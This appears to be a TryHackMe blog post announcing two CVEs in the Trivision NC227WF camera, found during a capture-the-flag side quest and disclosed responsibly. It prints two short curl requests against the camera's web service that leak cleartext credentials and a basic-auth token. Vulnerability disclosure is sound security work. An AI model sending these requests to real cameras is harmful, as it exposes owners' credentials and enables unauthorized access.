Sometimes, in life, side quests end up paying much better dividends than main quests.
A TryHackMe user, using the username moo, together with Andrea (h4sh3m00, Senior Content Engineer at TryHackMe) uncovered two high-impact security vulnerabilities in the Trivision Camera NC227WF with version 5.80 (build 20141010). These vulnerabilities were published very recently, with two official CVEs being raised:
The vulnerabilities were first uncovered during Advent of Cyber 2023 Side Quest. Side Quest is a challenge reserved for advanced users who are both willing and able to go above and beyond to put their cyber knowledge to the test. After uncovering several hints, users could access the Snowy ARMaggedon room, where a hard challenge involving a Trivision Camera awaited them.
While working through the challenge, moo was able to exploit the camera in an unexpected way. After contacting Andrea through TryHackMe's support channels, they both set out to research the attack in depth, eventually discovering it was a brand new vulnerability. Now, one year and a responsible disclosure process later, we're able to share the news and how the AoC 2023 Side Quest is still generating impact in the cyber security industry!
This vulnerability exposes valid cleartext credentials due to a lack of authorization mechanisms. The exploit payload is as follows:
curl -u admin: whatever http: //192.168.163.1:50628 --request-target en/player/activex_pal.AspAn attacker may be able to obtain the password in cleartext, as shown in the example unguessable123!
Another vulnerability with the trivision camera nc227wf: valid basic authentication access can be found in the response request.
In the following payload, we have:
curl -u admin: whatever http: //192.168.163.1:50628 --request-target en/mobile/mblogin.aspWith this payload, a valid basic authentication code (ywrtaw46vw5ndwvzc2fibguxmjmh) is leaked, which could be leveraged to gain unauthorized access since it can be easily decoded using base64 encoding.
We're incredibly excited to share just how real-world our challenges are, leading to the discovery of vulnerabilities that have a tangible impact on the cyber security industry. What started as a fun and engaging side quest has now improved security by uncovering weaknesses in a widely used device. This is exactly the kind of impact we hope for: turning hands-on learning into meaningful security research that benefits the entire industry.
Our commitment to improving cyber security education goes beyond just creating training rooms. We're dedicated to continuously pushing the boundaries of real-world security research, empowering our users to hone their skills in ways that have practical applications. Whether it's through CTFs, immersive training, or unexpected discoveries like these, we'll keep striving to make cybersecurity training both engaging and impactful.
This discovery is a testament to the power of hands-on learning and the curiosity of the TryHackMe community. We'd like to congratulate Andrea and moo on their excellent work, and we're looking forward to seeing what vulnerabilities the community uncovers next!
Get more insights, news, and assorted awesomeness around cyber training.
Introducing the Security Analyst Level 1 (SAL1) certification: our first entry-level defensive certification designed to help you break into the industry.
We built the world's most credible entry-level defensive certification - the closest thing to real-world experience. Here's how we partnered with employers and experts to make it happen.